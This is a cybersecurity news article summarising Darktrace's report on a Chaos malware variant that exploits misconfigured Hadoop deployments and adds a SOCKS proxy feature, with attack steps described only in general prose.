In a significant development within the cybersecurity landscape, researchers have identified a new variant of the Chaos malware that is now actively targeting misconfigured cloud environments. This shift highlights a growing trend where threat actors are increasingly exploiting cloud vulnerabilities to expand their attack surface and operational capabilities.

According to Darktrace, the updated malware demonstrates a clear evolution in strategy. “Chaos malware is increasingly targeting misconfigured cloud deployments, expanding beyond its traditional focus on routers and edge devices,” the company stated in its latest report. This transition signals a broader and more sophisticated approach by cybercriminals to infiltrate enterprise infrastructure.

Originally documented by Lumen Black Lotus Labs in September 2022, Chaos has long been recognized as a cross-platform threat capable of infecting both Windows and Linux systems. Historically, it enabled attackers to execute remote shell commands, deploy additional payloads, brute-force SSH credentials, mine cryptocurrency, and launch distributed denial-of-service (DDoS) attacks using multiple protocols, including HTTP, TCP, UDP, TLS, and WebSocket.

However, the latest findings reveal that attackers are now leveraging misconfigured Hadoop deployments to gain initial access. In the observed attack scenario, the intrusion began with a malicious HTTP request that triggered the creation of a rogue application within the targeted system. Subsequently, embedded shell commands downloaded a Chaos binary from a remote server, modified its permissions using “chmod 777,” executed it, and then deleted traces to evade forensic detection.

Notably, the domain used in this campaign has previously been linked to phishing operations conducted by the Chinese cybercrime group Silver Fox. That campaign, known as Operation Silk Lure and documented by Seqrite Labs, distributed decoy documents and ValleyRAT malware, suggesting a possible overlap in threat infrastructure.

Ad Banner

Furthermore, researchers observed that the updated 64-bit ELF variant of Chaos introduces several functional changes. While it removes earlier propagation techniques such as SSH brute-forcing and router exploitation, it compensates by integrating a SOCKS proxy feature. This enhancement allows compromised systems to relay malicious traffic, effectively masking attacker origins and complicating detection efforts.

Darktrace emphasized this evolution, stating, “In addition, several functions that were previously believed to be inherited from Kaiji have also been changed, suggesting that the threat actors have either rewritten the malware or refactored it extensively.” This indicates a deliberate effort to modernize the malware and adapt it to current cybercriminal demands.

Moreover, the inclusion of proxy capabilities points to a shift in monetization strategies. Beyond traditional DDoS attacks and crypto mining, attackers can now offer proxy-based services, further diversifying their illicit revenue streams. This aligns with broader trends seen in other botnets such as AISURU, which have also adopted similar features.

Concluding its findings, Darktrace warned, “While Chaos is not a new malware, its continued evolution highlights the dedication of cybercriminals to expand their botnets and enhance the capabilities at their disposal. The recent shift in botnets such as AISURU and Chaos to include proxy services as core features demonstrates that denial-of-service is no longer the only risk these botnets pose to organizations and their security teams.”

Overall, this development underscores the urgent need for organizations to secure cloud configurations and proactively monitor for emerging threats that exploit infrastructure misconfigurations.

Recommended Cyber Technology News:

To participate in our interviews, please write to our CyberTech Media Room at info@intentamplify.com  



🔒 Login or Register to continue reading